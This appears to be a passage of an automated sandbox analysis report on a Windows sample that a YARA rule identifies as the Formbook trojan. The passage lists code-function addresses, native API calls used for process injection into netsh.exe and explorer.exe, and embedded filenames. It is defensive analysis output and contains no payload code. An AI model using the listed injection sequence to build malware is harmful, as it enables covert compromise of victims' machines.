          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041A48A NtClose,6_2_0041A48A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,6_2_00BBA036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,6_2_00BB9BAF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBA042 NtQueryInformationProcess,6_2_00BBA042
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00BB9BB2
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_0297DF740_2_0297DF74
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_050C00060_2_050C0006
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_050C00400_2_050C0040
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_050C0A100_2_050C0A10
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_0749C7180_2_0749C718
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_0749A7D00_2_0749A7D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_0749C2E00_2_0749C2E0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_074921D70_2_074921D7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_074921E80_2_074921E8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_0749B0400_2_0749B040
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_0749AC080_2_0749AC08
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0040102D3_2_0040102D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_004012083_2_00401208
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041DB5F3_2_0041DB5F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_00409E5C3_2_00409E5C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041E7293_2_0041E729
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014481583_2_01448158
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0148B16B3_2_0148B16B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B01003_2_013B0100
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF1723_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F516C3_2_013F516C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145A1183_2_0145A118
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014781CC3_2_014781CC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CB1B03_2_013CB1B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014801AA3_2_014801AA
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146F0CC3_2_0146F0CC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147F0E03_2_0147F0E0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014770E93_2_014770E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C03_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147A3523_2_0147A352
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147132D3_2_0147132D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AD34C3_2_013AD34C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014803E63_2_014803E6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE3F03_2_013CE3F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0140739A3_2_0140739A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014602743_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014402C03_2_014402C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C52A03_2_013C52A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DD2F03_2_013DD2F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C03_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C05353_2_013C0535
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014775713_2_01477571
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014805913_2_01480591
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145D5B03_2_0145D5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014724463_2_01472446
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B14603_2_013B1460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147F43F3_2_0147F43F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146E4F63_2_0146E4F6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C07703_2_013C0770
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E47503_2_013E4750
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147F7B03_2_0147F7B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BC7C03_2_013BC7C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014716CC3_2_014716CC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DC6E03_2_013DC6E0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D69623_2_013D6962
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C99503_2_013C9950
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB9503_2_013DB950
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C29A03_2_013C29A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0148A9A63_2_0148A9A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D8003_2_0142D800
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CA8403_2_013CA840
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C28403_2_013C2840
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A68B83_2_013A68B8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EE8F03_2_013EE8F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C38E03_2_013C38E0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147AB403_2_0147AB40
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FB763_2_0147FB76
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01476BD73_2_01476BD7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01435BF03_2_01435BF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DFB803_2_013DFB80
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013FDBF93_2_013FDBF9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01477A463_2_01477A46
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FA493_2_0147FA49
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01433A6C3_2_01433A6C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146DAC63_2_0146DAC6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BEA803_2_013BEA80
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01405AA03_2_01405AA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145DAAC3_2_0145DAAC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01471D5A3_2_01471D5A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01477D733_2_01477D73
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CAD003_2_013CAD00
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C3D403_2_013C3D40
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D8DBF3_2_013D8DBF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BADE03_2_013BADE0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DFDC03_2_013DFDC0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0C003_2_013C0C00
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01439C323_2_01439C32
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FCF23_2_0147FCF2
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B0CF23_2_013B0CF2
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460CB53_2_01460CB5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01434F403_2_01434F40
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E0F303_2_013E0F30
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FF093_2_0147FF09
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01402F283_2_01402F28
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1F923_2_013C1F92
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143EFA03_2_0143EFA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B2FC83_2_013B2FC8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FFB13_2_0147FFB1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147EE263_2_0147EE26
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0E593_2_013C0E59
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C9EB03_2_013C9EB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147EEDB3_2_0147EEDB
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D2E903_2_013D2E90
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147CE933_2_0147CE93
          Source: C:\Windows\explorer.exeCode function: 4_2_0F38FB304_2_0F38FB30
          Source: C:\Windows\explorer.exeCode function: 4_2_0F38FB324_2_0F38FB32
          Source: C:\Windows\explorer.exeCode function: 4_2_0F3952324_2_0F395232
          Source: C:\Windows\explorer.exeCode function: 4_2_0F3929124_2_0F392912
          Source: C:\Windows\explorer.exeCode function: 4_2_0F38CD024_2_0F38CD02
          Source: C:\Windows\explorer.exeCode function: 4_2_0F3985CD4_2_0F3985CD
          Source: C:\Windows\explorer.exeCode function: 4_2_0F3940364_2_0F394036
          Source: C:\Windows\explorer.exeCode function: 4_2_0F38B0824_2_0F38B082
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88D2324_2_0F88D232
          Source: C:\Windows\explorer.exeCode function: 4_2_0F8905CD4_2_0F8905CD
          Source: C:\Windows\explorer.exeCode function: 4_2_0F884D024_2_0F884D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88A9124_2_0F88A912
          Source: C:\Windows\explorer.exeCode function: 4_2_0F887B304_2_0F887B30
          Source: C:\Windows\explorer.exeCode function: 4_2_0F887B324_2_0F887B32
          Source: C:\Windows\explorer.exeCode function: 4_2_0F8830824_2_0F883082
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88C0364_2_0F88C036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DF20006_2_00DF2000
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E181CC6_2_00E181CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E141A26_2_00E141A2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E201AA6_2_00E201AA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DE81586_2_00DE8158
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DFA1186_2_00DFA118
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D501006_2_00D50100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DE02C06_2_00DE02C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E002746_2_00E00274
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E203E66_2_00E203E6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D6E3F06_2_00D6E3F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1A3526_2_00E1A352
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E0E4F66_2_00E0E4F6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E124466_2_00E12446
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E044206_2_00E04420
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E205916_2_00E20591
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D605356_2_00D60535
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7C6E06_2_00D7C6E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D5C7C06_2_00D5C7C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D847506_2_00D84750
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D607706_2_00D60770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D8E8F06_2_00D8E8F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D468B86_2_00D468B8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D628406_2_00D62840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D6A8406_2_00D6A840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E2A9A66_2_00E2A9A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D629A06_2_00D629A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D769626_2_00D76962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D5EA806_2_00D5EA80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E16BD76_2_00E16BD7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1AB406_2_00E1AB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D50CF26_2_00D50CF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E00CB56_2_00E00CB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D60C006_2_00D60C00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D5ADE06_2_00D5ADE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D78DBF6_2_00D78DBF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DFCD1F6_2_00DFCD1F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D6AD006_2_00D6AD00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1EEDB6_2_00E1EEDB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D72E906_2_00D72E90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1CE936_2_00E1CE93
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D60E596_2_00D60E59
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1EE266_2_00E1EE26
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D52FC86_2_00D52FC8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DDEFA06_2_00DDEFA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DD4F406_2_00DD4F40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E02F306_2_00E02F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D80F306_2_00D80F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DA2F286_2_00DA2F28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1F0E06_2_00E1F0E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E170E96_2_00E170E9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D670C06_2_00D670C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E0F0CC6_2_00E0F0CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D6B1B06_2_00D6B1B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E2B16B6_2_00E2B16B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D4F1726_2_00D4F172
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D9516C6_2_00D9516C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E012ED6_2_00E012ED
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7B2C06_2_00D7B2C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7D2F06_2_00D7D2F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D652A06_2_00D652A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DA739A6_2_00DA739A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D4D34C6_2_00D4D34C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1132D6_2_00E1132D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D514606_2_00D51460
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1F43F6_2_00E1F43F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E295C36_2_00E295C3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DFD5B06_2_00DFD5B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E175716_2_00E17571
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E116CC6_2_00E116CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DA56306_2_00DA5630
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1F7B06_2_00E1F7B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D638E06_2_00D638E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DCD8006_2_00DCD800
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D699506_2_00D69950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7B9506_2_00D7B950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DF59106_2_00DF5910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E0DAC66_2_00E0DAC6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E01AA36_2_00E01AA3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DFDAAC6_2_00DFDAAC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DA5AA06_2_00DA5AA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E17A466_2_00E17A46
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FA496_2_00E1FA49
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DD3A6C6_2_00DD3A6C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D9DBF96_2_00D9DBF9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DD5BF06_2_00DD5BF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7FB806_2_00D7FB80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FB766_2_00E1FB76
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FCF26_2_00E1FCF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DD9C326_2_00DD9C32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7FDC06_2_00D7FDC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E17D736_2_00E17D73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D63D406_2_00D63D40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E11D5A6_2_00E11D5A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D65EC06_2_00D65EC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D69EB06_2_00D69EB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D23FD26_2_00D23FD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D23FD56_2_00D23FD5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D61F926_2_00D61F92
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FFB16_2_00E1FFB1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FF096_2_00E1FF09
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_01565EB06_2_01565EB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041E7296_2_0041E729
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00402D876_2_00402D87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00409E5C6_2_00409E5C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00409E606_2_00409E60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBA0366_2_00BBA036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB10826_2_00BB1082
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB89126_2_00BB8912
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBB2326_2_00BBB232
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB5B326_2_00BB5B32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB5B306_2_00BB5B30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBE5CD6_2_00BBE5CD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB2D026_2_00BB2D02
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 01407E54 appears 95 times
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 013F5130 appears 36 times
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 0142EA12 appears 86 times
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 0143F290 appears 103 times
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 013AB970 appears 254 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00DDF290 appears 103 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00DA7E54 appears 107 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00D95130 appears 58 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00DCEA12 appears 86 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00D4B970 appears 262 times
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1700497812.0000000000E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1701635552.0000000003D0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1704689007.00000000074A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1701121808.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.000000000134C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.00000000014AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exeBinary or memory string: OriginalFilenameAYIS.exe6 vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
